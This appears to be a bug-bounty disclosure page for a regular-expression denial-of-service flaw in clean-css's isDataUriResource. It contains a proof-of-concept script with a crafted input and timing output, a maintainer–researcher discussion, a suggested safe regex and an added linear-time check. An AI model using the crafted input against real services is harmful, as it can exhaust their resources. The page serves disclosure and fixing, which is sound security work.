Inefficient Regular Expression Complexity in clean-css/clean-css

Valid

Reported on

Sep 12th 2021


✍️ Description

A crafted input string causes a denial of service (inefficient regular expression complexity) when it is passed to the function isDataUriResource.

🕵️‍♂️ Proof of Concept

// PoC.js
var isDataUriResource = require("clean-css/lib/utils/is-data-uri-resource");

// Each iteration builds a longer input with no "," terminator, so the
// pattern never matches and the engine backtracks over every way of
// splitting the header before giving up.
for (var i = 1; i <= 50000; i++) {
  var time = Date.now();
  var attack_str = 'data:' + ';charset=a;'.repeat(i * 10000);
  isDataUriResource(attack_str);
  var time_cost = Date.now() - time;
  console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}

💥 The Output

attack_str.length: 110005: 4326 ms
attack_str.length: 220005: 17106 ms
We created a GitHub Issue asking the maintainers to create a SECURITY.md 3 months ago
We have contacted a member of the clean-css team and are waiting to hear back 3 months ago
clean-css/clean-css maintainer
3 months ago

Maintainer


Hey folks / @admin - this is the clean-css maintainer. I appreciate the security issue you disclosed, however I want you to comment on a few things:

  • clean-css is a quite popular library, however in 99.9% of cases it's used during a build process, so DoS at that point would result in a longer build process and/or a build crash
  • I believe those 0.1% of affected cases are when someone provides CSS optimization as a service (we do, but it's still done 100% inside a browser) and this may cause DoS and allow someone to escalate privileges etc.

Sure, we can do a fix, but there are probably countless other cases where this can happen.

Yeting Li
3 months ago

Researcher


Hi, nice to hear from you. If the CSS optimization is regarded as a service, it is indeed vulnerable to DoS attacks. I am willing to suggest that the maintainers replace the vulnerable regex /^data:(\S*?)?(;charset=[^;]+)?(;[^,]+?)?,(.+)/ with the safe regex /^data:(\S*?)?(;charset=(?:(?!;charset=)[^;])+)?(;[^,]+?)?,(.+)/.

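An added example, not code from clean-css, from the reporter, or from the fix merged in 3721c6: the vulnerable regex quoted above beside a single-pass data-URI check, plus a small timing helper of the kind a CI time-budget test would use. The stricter grammar the linear check enforces (no whitespace in the header, only `base64` or `attr=value` parameters) is an assumption of this example, not the behaviour of clean-css.

```javascript
// Regex the researcher quotes on this page (from clean-css's is-data-uri-resource.js).
const VULNERABLE_PATTERN = /^data:(\S*?)?(;charset=[^;]+)?(;[^,]+?)?,(.+)/;

const WHITESPACE = new Set([' ', '\t', '\n', '\r', '\f', '\v']);

// Linear-time check for the RFC 2397 shape
//   data:[<mediatype>][;<attr>=<value>]*[;base64],<data>
// Assumption of this example: stricter than VULNERABLE_PATTERN. The header before
// the first comma may not contain whitespace and every ";" parameter must be
// "base64" or "<attr>=<value>". Each step is one scan, so cost grows linearly.
function isDataUriResourceLinear(uri) {
  if (typeof uri !== 'string' || !uri.startsWith('data:')) return false;
  const comma = uri.indexOf(',', 5);
  if (comma === -1 || comma + 1 >= uri.length) return false; // no payload
  const header = uri.slice(5, comma);
  for (const ch of header) if (WHITESPACE.has(ch)) return false;
  const params = header.split(';').slice(1); // everything after the media type
  return params.every((p) => p === 'base64' || p.indexOf('=') > 0);
}

// Input from the report: repeated ";charset=a;" with no "," terminator.
function pathologicalInput(repeats) {
  return 'data:' + ';charset=a;'.repeat(repeats);
}

// Wall-clock milliseconds one call of `check` spends on `input`.
function elapsedMs(check, input) {
  const start = Date.now();
  check(input);
  return Date.now() - start;
}

// Compare both checks on growing inputs; a check whose time roughly
// quadruples when the input doubles is super-linear and needs replacing.
function compareTimings(repeatSizes) {
  return repeatSizes.map((n) => {
    const s = pathologicalInput(n);
    return {
      length: s.length,
      regexMs: elapsedMs((x) => VULNERABLE_PATTERN.test(x), s),
      linearMs: elapsedMs(isDataUriResourceLinear, s),
    };
  });
}

// Sizes small enough to finish in well under a second on a laptop.
for (const row of compareTimings([500, 1000, 2000])) {
  console.log(row.length + ' chars: regex ' + row.regexMs + ' ms, linear ' + row.linearMs + ' ms');
}
```
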
clean-css/clean-css maintainer validated this vulnerability a month ago
Yeting Li has been awarded the disclosure bounty
The fix bounty is now up for grabs
clean-css/clean-css maintainer confirmed that a fix has been merged on 3721c6 a month ago
The fix bounty has been dropped
is-data-uri-resource.js#L1 has been validated